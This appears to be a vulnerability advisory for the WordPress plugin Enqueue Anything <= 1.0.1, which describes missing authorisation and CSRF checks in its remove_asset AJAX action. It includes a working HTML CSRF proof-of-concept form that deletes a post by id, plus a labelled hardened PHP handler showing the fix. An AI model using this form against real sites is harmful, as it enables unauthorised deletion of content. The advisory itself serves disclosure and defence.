WordPress Plugin Vulnerabilities

Enqueue Anything <= 1.0.1 - Subscriber+ Arbitrary Asset/Post Deletion

Description

The plugin does not perform authorisation or CSRF checks in the remove_asset AJAX action, and does not ensure that the item to be deleted is actually an asset. As a result, low-privilege users such as subscribers could delete arbitrary assets, as well as put arbitrary posts in the trash.

v1.0.1 added a check to ensure that the post to be removed is an asset. However, the plugin is still missing capability and CSRF checks.

Proof of Concept

As a subscriber, or via CSRF against any authenticated user:
<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="remove_asset" />
      <input type="hidden" name="id" value="289" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
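
The three checks the description names (CSRF nonce, asset type, capability), shown in a hardened handler for the same AJAX action. This is an added example, not the plugin's own code: the function name, the nonce action `ea_remove_asset`, the `nonce` field and the post type slug `ea_asset` are assumptions.

```php
<?php
// Added example, not the plugin's code. The handler name, the nonce action
// 'ea_remove_asset', the 'nonce' field and the post type 'ea_asset' are
// hypothetical names chosen for illustration.

// Logged-in users only: no wp_ajax_nopriv_ hook is registered.
add_action( 'wp_ajax_remove_asset', 'ea_example_remove_asset' );

function ea_example_remove_asset() {
    // 1. CSRF: require a nonce bound to this action and the user's session.
    //    $die = false lets us return our own error response.
    if ( ! check_ajax_referer( 'ea_remove_asset', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce.' ), 403 );
    }

    // 2. Input: the id must be a positive integer.
    $id = isset( $_POST['id'] ) ? absint( wp_unslash( $_POST['id'] ) ) : 0;
    if ( 0 === $id ) {
        wp_send_json_error( array( 'message' => 'Missing id.' ), 400 );
    }

    // 3. Object type: only assets may be removed through this endpoint
    //    (the kind of check the advisory says v1.0.1 added).
    if ( 'ea_asset' !== get_post_type( $id ) ) {
        wp_send_json_error( array( 'message' => 'Not an asset.' ), 404 );
    }

    // 4. Authorisation: meta capability check on this specific post.
    //    With default post-type capabilities the subscriber role fails it.
    if ( ! current_user_can( 'delete_post', $id ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden.' ), 403 );
    }

    // wp_send_json_error() above terminates the request, so this line is
    // reached only when all four checks passed.
    if ( ! wp_delete_post( $id ) ) {
        wp_send_json_error( array( 'message' => 'Delete failed.' ), 500 );
    }
    wp_send_json_success( array( 'deleted' => $id ) );
}

// The admin screen that sends the request must pass the nonce to its script:
// wp_localize_script( $handle, 'eaAjax',
//     array( 'nonce' => wp_create_nonce( 'ea_remove_asset' ) ) );
```

With these checks in place, the form above fails at step 1 when submitted cross-site, and at step 4 when submitted by a subscriber who has obtained a valid nonce.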

Affects Plugins

No known fix

References

Classification

Type
NO AUTHORISATION
CWE

Miscellaneous

Original Researcher
abhishek bhoir
Submitter
abhishek bhoir
Verified
Yes

Timeline

Publicly Published
2022-05-17
Added
2022-05-17
Last Updated
2022-05-18
